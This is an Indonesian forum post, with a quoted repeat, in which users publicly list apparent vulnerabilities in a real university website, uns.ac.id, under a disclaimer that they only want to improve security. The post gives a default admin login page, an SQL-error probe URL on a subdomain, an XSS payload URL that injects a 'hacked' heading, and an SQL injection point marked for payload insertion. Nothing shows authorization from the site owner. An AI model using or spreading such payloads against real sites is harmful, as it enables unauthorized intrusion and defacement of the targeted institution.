11-29-2011, 02:47 PM
disclaimer :
ini di pentest hanya untuk memperbaiki IT security di indonesia .. kita mencari bug nnti akan kita laporkan ke admin .. dengan tidak bermaksud merusak sama sekali.
hasil crawl
login admin default .. ntah palsu apa gk
hmmm celah dapat di temukan di subdomain
error koneksi database...
ada yang bisa menambahkan ?
saya tambahkan xss ..
SQLI Injection
ini di pentest hanya untuk memperbaiki IT security di indonesia .. kita mencari bug nnti akan kita laporkan ke admin .. dengan tidak bermaksud merusak sama sekali.
hasil crawl
login admin default .. ntah palsu apa gk
Code:
http://www.uns.ac.id/login.php
hmmm celah dapat di temukan di subdomain
Code:
http://lppm.uns.ac.id/sirine/penelitian.php?act=jenisp&kds=S07%27
error koneksi database...
Code:
http://www.uns.ac.id/direktori_sdm/
ada yang bisa menambahkan ?
saya tambahkan xss ..
Code:
http://www.uns.ac.id//news_event.php/%22%3Ch1%3E%28Ikonspirasi%20hacked%29%3C/h1%3E%3E
SQLI Injection
Code:
http://www.uns.ac.id//news_event.php?act=ars&arsBln=%24{injecthere}&idMn=1